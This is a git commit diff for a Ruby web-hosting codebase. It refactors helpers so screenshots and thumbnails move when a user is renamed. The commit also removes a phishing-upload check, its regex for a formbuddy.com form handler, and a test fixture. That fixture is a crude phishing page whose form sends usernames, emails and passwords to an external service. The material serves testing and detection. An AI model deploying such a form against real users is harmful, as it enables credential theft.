Move screenshots/thumbs when renaming user.

Also DRY up a bit, remove some old code. Fix an extra path slash, and fix screenshot display in dashboard.
2025-04-24 17:22:35 +02:00 · 2020-01-27 01:53:54 -08:00 · 2020-01-27 01:53:54 -08:00 · 780c093dd6
commit 780c093dd6
parent 9f7bbe16e7
3 changed files with 44 additions and 70 deletions
--- a/models/site.rb
+++ b/models/site.rb
@ -90,7 +90,6 @@ class Site < Sequel::Model

  EMPTY_FILE_HASH = Digest::SHA1.hexdigest ''

-  PHISHING_FORM_REGEX = /www.formbuddy.com\/cgi-bin\/form.pl/i
  EMAIL_SANITY_REGEX = /.+@.+\..+/i
  EDITABLE_FILE_EXT = /#{VALID_EDITABLE_EXTENSIONS.join('|')}/i
  BANNED_TIME = 2592000 # 30 days in seconds
@ -471,7 +470,7 @@ class Site < Sequel::Model
      self.domain = nil
      self.save_changes validate: false
      owner.end_supporter_membership! if parent?
-      FileUtils.mkdir_p File.join(DELETED_SITES_ROOT, self.class.sharding_dir(username))
+      FileUtils.mkdir_p File.join(DELETED_SITES_ROOT, sharding_dir)

      begin
        FileUtils.mv files_path, deleted_files_path
@ -491,7 +490,7 @@ class Site < Sequel::Model

  def undelete!
    return false unless Dir.exist? deleted_files_path
-    FileUtils.mkdir_p File.join(SITE_FILES_ROOT, self.class.sharding_dir(username))
+    FileUtils.mkdir_p File.join(SITE_FILES_ROOT, sharding_dir)

    DB.transaction {
      FileUtils.mv deleted_files_path, files_path
@ -674,20 +673,9 @@ class Site < Sequel::Model

  def okay_to_upload?(uploaded_file)
    return true if [:supporter].include?(plan_type.to_sym)
-    return false if self.class.possible_phishing?(uploaded_file)
    self.class.valid_file_type?(uploaded_file)
  end

-  def self.possible_phishing?(uploaded_file)
-    if File.extname(uploaded_file[:filename]).match EDITABLE_FILE_EXT
-      open(uploaded_file[:tempfile].path, 'r:binary') {|f|
-        matches = f.grep PHISHING_FORM_REGEX
-        return true unless matches.empty?
-      }
-    end
-    false
-  end
-
  def self.valid_file_mime_type_and_ext?(mime_type, extname)
    unless (Site::VALID_MIME_TYPES.include?(mime_type) || mime_type =~ /text/ || mime_type =~ /inode\/x-empty/) &&
           Site::VALID_EXTENSIONS.include?(extname.sub(/^./, '').downcase)
@ -763,7 +751,7 @@ class Site < Sequel::Model
    if $config['ipfs_ssh_host'] && $config['ipfs_ssh_user']
      rbox = Rye::Box.new $config['ipfs_ssh_host'], user: $config['ipfs_ssh_user']
      begin
-        cidv0    = rbox.ipfs(:add, :r, :Q, "sites/#{self.class.sharding_dir self.username}/#{self.username.gsub(/\/|\.\./, '')}").first
+        cidv0    = rbox.ipfs(:add, :r, :Q, "sites/#{sharding_dir}/#{self.username.gsub(/\/|\.\./, '')}").first
        cidv1b32 = rbox.ipfs(:cid, :base32, cidv0).first
      ensure
        rbox.disconnect
@ -883,7 +871,13 @@ class Site < Sequel::Model

  def move_files_from(oldusername)
    FileUtils.mkdir_p self.class.sharding_base_path(username)
+    FileUtils.mkdir_p self.class.sharding_screenshots_path(username)
+    FileUtils.mkdir_p self.class.sharding_thumbnails_path(username)
    FileUtils.mv base_files_path(oldusername), base_files_path
+    otp = base_thumbnails_path(oldusername)
+    osp = base_screenshots_path(oldusername)
+    FileUtils.mv(otp, base_thumbnails_path) if File.exist?(otp)
+    FileUtils.mv(osp, base_screenshots_path) if File.exist?(osp)
  end

  def install_new_html_file(path)
@ -1168,7 +1162,7 @@ class Site < Sequel::Model

  def current_base_files_path(name=username)
    raise 'username missing' if name.nil? || name.empty?
-    return File.join DELETED_SITES_ROOT, self.class.sharding_dir(name), name if is_deleted
+    return base_deleted_files_path if is_deleted
    base_files_path name
  end

@ -1186,11 +1180,23 @@ class Site < Sequel::Model
    File.join SITE_FILES_ROOT, sharding_dir(name)
  end

+  def self.sharding_screenshots_path(name)
+    File.join SCREENSHOTS_ROOT, sharding_dir(name)
+  end
+
+  def self.sharding_thumbnails_path(name)
+    File.join THUMBNAILS_ROOT, sharding_dir(name)
+  end
+
  def self.sharding_dir(name)
    chksum = Zlib::crc32(name).to_s
    File.join(chksum[0..1], chksum[2..3])
  end

+  def sharding_dir
+    self.class.sharding_dir values[:username]
+  end
+
  # https://practicingruby.com/articles/implementing-an-http-file-server?u=dc2ab0f9bb
  def scrubbed_path(path='')
    path ||= ''
@ -1227,10 +1233,11 @@ class Site < Sequel::Model

  def file_list(path='')
    list = Dir.glob(File.join(files_path(path), '*')).collect do |file_path|
+      extname = File.extname file_path
      file = {
        path: file_path.gsub(base_files_path, ''),
        name: File.basename(file_path),
-        ext: File.extname(file_path).gsub('.', ''),
+        ext: extname.gsub('.', ''),
        is_directory: File.directory?(file_path),
        is_root_index: file_path == "#{base_files_path}/index.html"
      }
@ -1242,7 +1249,7 @@ class Site < Sequel::Model
        file[:updated_at] = site_file.updated_at
      end

-      file[:is_html] = !(file[:ext].match HTML_REGEX).nil?
+      file[:is_html] = !(extname.match(HTML_REGEX)).nil?
      file[:is_image] = !(file[:ext].match IMAGE_REGEX).nil?
      file[:is_editable] = !(file[:ext].match EDITABLE_FILE_EXT).nil?

@ -1497,21 +1504,33 @@ class Site < Sequel::Model
  end

  def screenshot_path(path, resolution)
-    File.join(SCREENSHOTS_ROOT, self.class.sharding_dir(values[:username]), values[:username], "#{path}.#{resolution}.jpg")
+    File.join base_screenshots_path, "#{path}.#{resolution}.jpg"
+  end
+
+  def base_screenshots_path(name=username)
+    raise 'screenshots name missing' if name.nil? || name.empty?
+    File.join self.class.sharding_screenshots_path(name), name
+  end
+
+  def base_screenshots_url(name=username)
+    raise 'screenshots name missing' if name.nil? || name.empty?
+    File.join SCREENSHOTS_URL_ROOT, self.class.sharding_dir(name), name
  end

  def screenshot_exists?(path, resolution)
-    File.exist? File.join(SCREENSHOTS_ROOT, values[:username], "#{path}.#{resolution}.jpg")
+    File.exist? File.join(base_screenshots_path, "#{path}.#{resolution}.jpg")
  end

  def screenshot_url(path, resolution)
+    path[0] = '' if path[0] == '/'
    out = ''
    out = 'https://neocities.org' if ENV['RACK_ENV'] == 'development'
-    out+"#{SCREENSHOTS_URL_ROOT}/#{self.class.sharding_dir(values[:username])}/#{values[:username]}/#{path}.#{resolution}.jpg"
+    out+"#{base_screenshots_url}/#{path}.#{resolution}.jpg"
  end

-  def base_thumbnails_path
-    File.join THUMBNAILS_ROOT, self.class.sharding_dir(values[:username]), values[:username]
+  def base_thumbnails_path(name=username)
+    raise 'thumbnails name missing' if name.nil? || name.empty?
+    File.join self.class.sharding_thumbnails_path(name), name
  end

  def thumbnail_path(path, resolution)
@ -1528,8 +1547,9 @@ class Site < Sequel::Model
  end

  def thumbnail_url(path, resolution)
+    path[0] = '' if path[0] == '/'
    ext = File.extname(path).gsub('.', '').match(LOSSY_IMAGE_REGEX) ? 'jpg' : 'png'
-    "#{THUMBNAILS_URL_ROOT}/#{self.class.sharding_dir(values[:username])}/#{values[:username]}/#{path}.#{resolution}.#{ext}"
+    "#{THUMBNAILS_URL_ROOT}/#{sharding_dir}/#{values[:username]}/#{path}.#{resolution}.#{ext}"
  end

  def to_rss
--- a/tests/files/phishing.html
+++ b/tests/files/phishing.html
@ -1,41 +0,0 @@
-<html>
-<head>
-<title>Phishing attack that only works on complete idiots that deserve to get hacked</title>
-</head>
-<body>
-<left>
-<h3>DU HAST MICH GIVE THIS RANDOM WEB SITE YOUR LOGIN CREDENTIALS DERRRRP</h3>
-
-<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
-<input type="hidden" name="username" value="germanslol">
-<input type="hidden" name="reqd" value="0">
-<input type="hidden" name="url" value="https://blahblah.com/owa/">
-
-
-<table border="0">
-<tr>
-<td align="right"><b>DU:</b>
-<td><input type="text" name="gebruikersnaam" size="36" maxlength="100">
-</tr>
-<tr>
-<td align="right"><b>E-Mail:</b>
-<td><input type="text" name="e-mail" size="36" maxlength="100">
-</tr>
-<tr>
-<td align="right"><b>HAST:</b>
-<td><input type="wachtwoord" name="wachtwoord" size="36" maxlength="100">
-</tr>
-<tr>
-<td align="right"><b>MICH:</b>
-<td><input type="Password" name="bevestig wachtwoord" size="36" maxlength="100">
-</tr>
-</table>
-
-
-<p><input type="submit" value="Submit"><input type="reset" value="Reset">
-</form>
-
-
-</Left>
-</body>
-</html>
--- a/tests/site_file_tests.rb
+++ b/tests/site_file_tests.rb
@ -232,11 +232,6 @@ describe 'site_files' do
  end

  describe 'upload' do
-    it 'fails for suspected phishing' do
-      upload 'files[]' => Rack::Test::UploadedFile.new('./tests/files/phishing.html', 'text/html')
-      File.exists?(@site.files_path('phishing.html')).must_equal false
-    end
-
    it 'works with empty files' do
      upload 'files[]' => Rack::Test::UploadedFile.new('./tests/files/empty.js', 'text/javascript')
      File.exists?(@site.files_path('empty.js')).must_equal true